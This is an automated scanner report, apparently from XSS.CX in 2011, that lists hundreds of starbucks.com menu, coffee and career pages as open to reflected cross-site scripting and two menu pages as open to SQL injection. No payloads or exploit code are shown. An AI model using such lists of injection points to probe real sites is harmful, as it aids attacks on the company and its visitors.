XSS, starbucks.com, Cross Site Scripting, Proof of Concept

XSS in starbucks.com | Vulnerability Crawler Report

Report generated by XSS.CX at Tue Feb 08 11:37:52 CST 2011.



DORK CWE-79 XSS Report

1. SQL injection

1.1. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

1.2. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

2.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

2.3. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]

2.4. http://www.starbucks.com/about-us/company-information [name of an arbitrarily supplied request parameter]

2.5. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement [name of an arbitrarily supplied request parameter]

2.6. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use [name of an arbitrarily supplied request parameter]

2.7. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility [name of an arbitrarily supplied request parameter]

2.8. http://www.starbucks.com/about-us/company-information/product-advisories [name of an arbitrarily supplied request parameter]

2.9. http://www.starbucks.com/about-us/our-heritage [name of an arbitrarily supplied request parameter]

2.10. http://www.starbucks.com/business [name of an arbitrarily supplied request parameter]

2.11. http://www.starbucks.com/business/foodservice [name of an arbitrarily supplied request parameter]

2.12. http://www.starbucks.com/business/international-stores [name of an arbitrarily supplied request parameter]

2.13. http://www.starbucks.com/business/licensed-stores [name of an arbitrarily supplied request parameter]

2.14. http://www.starbucks.com/business/office-coffee [name of an arbitrarily supplied request parameter]

2.15. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

2.16. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

2.17. http://www.starbucks.com/career-center/career-diversity [name of an arbitrarily supplied request parameter]

2.18. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

2.19. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

2.20. http://www.starbucks.com/career-center/international-positions [name of an arbitrarily supplied request parameter]

2.21. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

2.22. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

2.23. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

2.24. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

2.25. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

2.26. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

2.27. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

2.28. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

2.29. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

2.30. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

2.31. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

2.32. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

2.33. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

2.34. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

2.35. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

2.36. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

2.37. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

2.38. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

2.39. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

2.40. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

2.41. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

2.42. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

2.43. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

2.44. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

2.45. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

2.46. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

2.47. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

2.48. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

2.49. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

2.50. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

2.51. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

2.52. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

2.53. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

2.54. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast [name of an arbitrarily supplied request parameter]

2.55. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

2.56. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

2.57. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

2.58. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

2.59. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

2.60. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

2.61. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]

2.62. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]

2.63. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

2.64. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

2.65. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

2.66. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

2.67. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]

2.68. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]

2.69. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]

2.70. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]

2.71. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]

2.72. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]

2.73. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]

2.74. http://www.starbucks.com/customer-service [name of an arbitrarily supplied request parameter]

2.75. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]

2.76. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]

2.77. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

2.78. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]

2.79. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]

2.80. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]

2.81. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]

2.82. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

2.83. http://www.starbucks.com/menu/ [name of an arbitrarily supplied request parameter]

2.84. http://www.starbucks.com/menu/catalog/nutrition [name of an arbitrarily supplied request parameter]

2.85. http://www.starbucks.com/menu/catalog/nutrition [wellness parameter]

2.86. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

2.87. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.88. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha [name of an arbitrarily supplied request parameter]

2.89. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla [name of an arbitrarily supplied request parameter]

2.90. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.91. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.92. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino [name of an arbitrarily supplied request parameter]

2.93. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot [name of an arbitrarily supplied request parameter]

2.94. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot [name of an arbitrarily supplied request parameter]

2.95. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.96. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.97. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day [name of an arbitrarily supplied request parameter]

2.98. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto [name of an arbitrarily supplied request parameter]

2.99. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee [name of an arbitrarily supplied request parameter]

2.100. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler [name of an arbitrarily supplied request parameter]

2.101. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

2.102. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee [name of an arbitrarily supplied request parameter]

2.103. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast [name of an arbitrarily supplied request parameter]

2.104. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate [name of an arbitrarily supplied request parameter]

2.105. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate [name of an arbitrarily supplied request parameter]

2.106. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate [name of an arbitrarily supplied request parameter]

2.107. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate [name of an arbitrarily supplied request parameter]

2.108. http://www.starbucks.com/menu/drinks/espresso/caffe-americano [name of an arbitrarily supplied request parameter]

2.109. http://www.starbucks.com/menu/drinks/espresso/caffe-latte [name of an arbitrarily supplied request parameter]

2.110. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha [name of an arbitrarily supplied request parameter]

2.111. http://www.starbucks.com/menu/drinks/espresso/cappuccino [name of an arbitrarily supplied request parameter]

2.112. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte [name of an arbitrarily supplied request parameter]

2.113. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato [name of an arbitrarily supplied request parameter]

2.114. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

2.115. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte [name of an arbitrarily supplied request parameter]

2.116. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna [name of an arbitrarily supplied request parameter]

2.117. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato [name of an arbitrarily supplied request parameter]

2.118. http://www.starbucks.com/menu/drinks/espresso/espresso-shot [name of an arbitrarily supplied request parameter]

2.119. http://www.starbucks.com/menu/drinks/espresso/flavored-latte [name of an arbitrarily supplied request parameter]

2.120. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte [name of an arbitrarily supplied request parameter]

2.121. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano [name of an arbitrarily supplied request parameter]

2.122. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte [name of an arbitrarily supplied request parameter]

2.123. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha [name of an arbitrarily supplied request parameter]

2.124. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato [name of an arbitrarily supplied request parameter]

2.125. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

2.126. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte [name of an arbitrarily supplied request parameter]

2.127. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte [name of an arbitrarily supplied request parameter]

2.128. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha [name of an arbitrarily supplied request parameter]

2.129. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.130. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

2.131. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte [name of an arbitrarily supplied request parameter]

2.132. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha [name of an arbitrarily supplied request parameter]

2.133. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.134. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha [name of an arbitrarily supplied request parameter]

2.135. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.136. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

2.137. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato [name of an arbitrarily supplied request parameter]

2.138. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

2.139. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte [name of an arbitrarily supplied request parameter]

2.140. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha [name of an arbitrarily supplied request parameter]

2.141. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.142. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

2.143. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.144. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.145. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.146. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.147. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.148. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.149. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.150. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.151. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.152. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.153. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.154. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.155. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.156. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.157. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.158. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.159. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.160. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.161. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.162. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.163. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

2.164. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.165. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.166. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

2.167. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.168. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.169. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.170. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

2.171. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.172. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.173. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.174. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice [name of an arbitrarily supplied request parameter]

2.175. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice [name of an arbitrarily supplied request parameter]

2.176. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk [name of an arbitrarily supplied request parameter]

2.177. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk [name of an arbitrarily supplied request parameter]

2.178. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice [name of an arbitrarily supplied request parameter]

2.179. http://www.starbucks.com/menu/drinks/tazo-tea/awake [name of an arbitrarily supplied request parameter]

2.180. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte [name of an arbitrarily supplied request parameter]

2.181. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea [name of an arbitrarily supplied request parameter]

2.182. http://www.starbucks.com/menu/drinks/tazo-tea/calm [name of an arbitrarily supplied request parameter]

2.183. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte [name of an arbitrarily supplied request parameter]

2.184. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips [name of an arbitrarily supplied request parameter]

2.185. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey [name of an arbitrarily supplied request parameter]

2.186. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte [name of an arbitrarily supplied request parameter]

2.187. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte [name of an arbitrarily supplied request parameter]

2.188. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte [name of an arbitrarily supplied request parameter]

2.189. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte [name of an arbitrarily supplied request parameter]

2.190. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte [name of an arbitrarily supplied request parameter]

2.191. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom [name of an arbitrarily supplied request parameter]

2.192. http://www.starbucks.com/menu/drinks/tazo-tea/passion [name of an arbitrarily supplied request parameter]

2.193. http://www.starbucks.com/menu/drinks/tazo-tea/refresh [name of an arbitrarily supplied request parameter]

2.194. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade [name of an arbitrarily supplied request parameter]

2.195. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea [name of an arbitrarily supplied request parameter]

2.196. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade [name of an arbitrarily supplied request parameter]

2.197. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea [name of an arbitrarily supplied request parameter]

2.198. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade [name of an arbitrarily supplied request parameter]

2.199. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea [name of an arbitrarily supplied request parameter]

2.200. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte [name of an arbitrarily supplied request parameter]

2.201. http://www.starbucks.com/menu/drinks/tazo-tea/zen [name of an arbitrarily supplied request parameter]

2.202. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie [name of an arbitrarily supplied request parameter]

2.203. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie [name of an arbitrarily supplied request parameter]

2.204. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie [name of an arbitrarily supplied request parameter]

2.205. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

2.206. http://www.starbucks.com/menu/food/bakery/8-grain-roll [name of an arbitrarily supplied request parameter]

2.207. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin [name of an arbitrarily supplied request parameter]

2.208. http://www.starbucks.com/menu/food/bakery/apple-fritter [name of an arbitrarily supplied request parameter]

2.209. http://www.starbucks.com/menu/food/bakery/asiago-bagel [name of an arbitrarily supplied request parameter]

2.210. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf [name of an arbitrarily supplied request parameter]

2.211. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut [name of an arbitrarily supplied request parameter]

2.212. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar [name of an arbitrarily supplied request parameter]

2.213. http://www.starbucks.com/menu/food/bakery/blueberry-scone [name of an arbitrarily supplied request parameter]

2.214. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin [name of an arbitrarily supplied request parameter]

2.215. http://www.starbucks.com/menu/food/bakery/butter-croissant [name of an arbitrarily supplied request parameter]

2.216. http://www.starbucks.com/menu/food/bakery/cheese-danish [name of an arbitrarily supplied request parameter]

2.217. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie [name of an arbitrarily supplied request parameter]

2.218. http://www.starbucks.com/menu/food/bakery/chocolate-croissant [name of an arbitrarily supplied request parameter]

2.219. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut [name of an arbitrarily supplied request parameter]

2.220. http://www.starbucks.com/menu/food/bakery/chonga-bagel [name of an arbitrarily supplied request parameter]

2.221. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone [name of an arbitrarily supplied request parameter]

2.222. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone [name of an arbitrarily supplied request parameter]

2.223. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie [name of an arbitrarily supplied request parameter]

2.224. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut [name of an arbitrarily supplied request parameter]

2.225. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll [name of an arbitrarily supplied request parameter]

2.226. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie [name of an arbitrarily supplied request parameter]

2.227. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel [name of an arbitrarily supplied request parameter]

2.228. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake [name of an arbitrarily supplied request parameter]

2.229. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin [name of an arbitrarily supplied request parameter]

2.230. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread [name of an arbitrarily supplied request parameter]

2.231. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone [name of an arbitrarily supplied request parameter]

2.232. http://www.starbucks.com/menu/food/bakery/marble-pound-cake [name of an arbitrarily supplied request parameter]

2.233. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar [name of an arbitrarily supplied request parameter]

2.234. http://www.starbucks.com/menu/food/bakery/morning-bun [name of an arbitrarily supplied request parameter]

2.235. http://www.starbucks.com/menu/food/bakery/multigrain-bagel [name of an arbitrarily supplied request parameter]

2.236. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut [name of an arbitrarily supplied request parameter]

2.237. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie [name of an arbitrarily supplied request parameter]

2.238. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone [name of an arbitrarily supplied request parameter]

2.239. http://www.starbucks.com/menu/food/bakery/plain-bagel [name of an arbitrarily supplied request parameter]

2.240. http://www.starbucks.com/menu/food/bakery/pumpkin-bread [name of an arbitrarily supplied request parameter]

2.241. http://www.starbucks.com/menu/food/bakery/raspberry-scone [name of an arbitrarily supplied request parameter]

2.242. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake [name of an arbitrarily supplied request parameter]

2.243. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake [name of an arbitrarily supplied request parameter]

2.244. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake [name of an arbitrarily supplied request parameter]

2.245. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake [name of an arbitrarily supplied request parameter]

2.246. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake [name of an arbitrarily supplied request parameter]

2.247. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie [name of an arbitrarily supplied request parameter]

2.248. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie [name of an arbitrarily supplied request parameter]

2.249. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake [name of an arbitrarily supplied request parameter]

2.250. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin [name of an arbitrarily supplied request parameter]

2.251. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate [name of an arbitrarily supplied request parameter]

2.252. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate [name of an arbitrarily supplied request parameter]

2.253. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate [name of an arbitrarily supplied request parameter]

2.254. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll [name of an arbitrarily supplied request parameter]

2.255. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap [name of an arbitrarily supplied request parameter]

2.256. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar [name of an arbitrarily supplied request parameter]

2.257. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit [name of an arbitrarily supplied request parameter]

2.258. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts [name of an arbitrarily supplied request parameter]

2.259. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin [name of an arbitrarily supplied request parameter]

2.260. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin [name of an arbitrarily supplied request parameter]

2.261. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal [name of an arbitrarily supplied request parameter]

2.262. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich [name of an arbitrarily supplied request parameter]

